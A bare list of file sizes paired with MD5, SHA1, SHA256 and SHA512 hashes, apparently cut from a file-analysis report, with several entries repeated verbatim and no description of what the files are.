SHA18c0531eaec62fa6c7f18befcd2732d88b968c8de
SHA256f104365d9d691369911b38002c19e70d462a50a243a35bca970cc00f80040f52
SHA512a59a54f8158e7056fa8cea984947fcf5575b59daa278d9ef9e959885bf3212d825a781686d454845c311ccd09dca7c7931de5942317ea9eb94a215e7a7e724c8
-
Filesize
990KB
MD5bc8dfcb4093f0bb356e3103af15f3d1b
SHA125ec668fbf84db1b01fa623382da77fd53138833
SHA2567f016599bc5b598d9ba9f8e869a36e0c128bc6bbccffb391b05993b62ca71baa
SHA51216ebdba2c60d11eff09bee5cf1dfcd4d9c726952185766b9497a8f177f239cae2edf90f629a3ff51e2ac88b6e7e7300d43359074a906f7d282b4b28465cdf79d
-
Filesize
990KB
MD5bc8dfcb4093f0bb356e3103af15f3d1b
SHA125ec668fbf84db1b01fa623382da77fd53138833
SHA2567f016599bc5b598d9ba9f8e869a36e0c128bc6bbccffb391b05993b62ca71baa
SHA51216ebdba2c60d11eff09bee5cf1dfcd4d9c726952185766b9497a8f177f239cae2edf90f629a3ff51e2ac88b6e7e7300d43359074a906f7d282b4b28465cdf79d
-
Filesize
990KB
MD5bc8dfcb4093f0bb356e3103af15f3d1b
SHA125ec668fbf84db1b01fa623382da77fd53138833
SHA2567f016599bc5b598d9ba9f8e869a36e0c128bc6bbccffb391b05993b62ca71baa
SHA51216ebdba2c60d11eff09bee5cf1dfcd4d9c726952185766b9497a8f177f239cae2edf90f629a3ff51e2ac88b6e7e7300d43359074a906f7d282b4b28465cdf79d
-
Filesize
9.9MB
MD59889b03f358c1e2a2635ae17eb4bf489
SHA13919276a8b72c4205512dd41ecf8c066bf721be0
SHA2560c879e57aab759d1e31ba1ac2a03ffe1be3f44bd028a2dd4c597acec333b83d6
SHA512ef9522066e646523c53249f788efdef9ac441087d8f6b6a5a56a2811f71cbf3b344be0f118bc9f3c12f62767d427736e5cab200c55ed66521170b3fc0ce31d6a
-
Filesize
9.9MB
MD59889b03f358c1e2a2635ae17eb4bf489
SHA13919276a8b72c4205512dd41ecf8c066bf721be0
SHA2560c879e57aab759d1e31ba1ac2a03ffe1be3f44bd028a2dd4c597acec333b83d6
SHA512ef9522066e646523c53249f788efdef9ac441087d8f6b6a5a56a2811f71cbf3b344be0f118bc9f3c12f62767d427736e5cab200c55ed66521170b3fc0ce31d6a
-
Filesize
2.8MB
MD5ec4951e9f2b1945815954fec161cf57a
SHA18e9e6857a0251a89b9c43b650344fb4f1648fa76
SHA256d969fc2e15743d6d44f477907368f2ebc96cefba20a232861fc7337bfa938d75
SHA512596e28d3529be33483589973ac34410f574cd888bda74e1e24afb2a2de107af4e788e2a27648da3c4fe4db4f49184244ce6ccf50f480c95c8d252d541587ad15
-
Filesize
2.8MB
MD5ec4951e9f2b1945815954fec161cf57a
SHA18e9e6857a0251a89b9c43b650344fb4f1648fa76
SHA256d969fc2e15743d6d44f477907368f2ebc96cefba20a232861fc7337bfa938d75
SHA512596e28d3529be33483589973ac34410f574cd888bda74e1e24afb2a2de107af4e788e2a27648da3c4fe4db4f49184244ce6ccf50f480c95c8d252d541587ad15
-
Filesize
2.8MB
MD5ec4951e9f2b1945815954fec161cf57a
SHA18e9e6857a0251a89b9c43b650344fb4f1648fa76
SHA256d969fc2e15743d6d44f477907368f2ebc96cefba20a232861fc7337bfa938d75
SHA512596e28d3529be33483589973ac34410f574cd888bda74e1e24afb2a2de107af4e788e2a27648da3c4fe4db4f49184244ce6ccf50f480c95c8d252d541587ad15
-
Filesize
5KB
MD546a230aaad0a4275c67c82979d15f063
SHA117c974ed28d9e038f22919757b5333664affd77b
SHA25619c69db7e74e02c97f6837106e8df034700b8aeea212d359c7f9179bec4d3d94
SHA512cac8da2eec4a2ed5af420c2087fde1304f71c0702dedc511b8ce3cac5ba60e83f8afd56964107751aa50914bfa83034aef8399435c273724b02bded5a5ad4365
-
Filesize
115B
MD56f3351eb42186a6064aa8a059d41c040
SHA15d8cde3fa7b4054859bf30c7e56bed82bf042341
SHA256c6f80401d51dc0a79b0ef5b0521402ef7ba040fc0bd0f0b834c5e8bb41ad7a01
SHA5121b34c0a0768ebaaf84b524fef9d61af3c8b6a1f7dfe356137415f503ba93fd204eba56eeec76359ae0f90b75a7988e79d4836f6262c4e29a6864e7f1b871aa07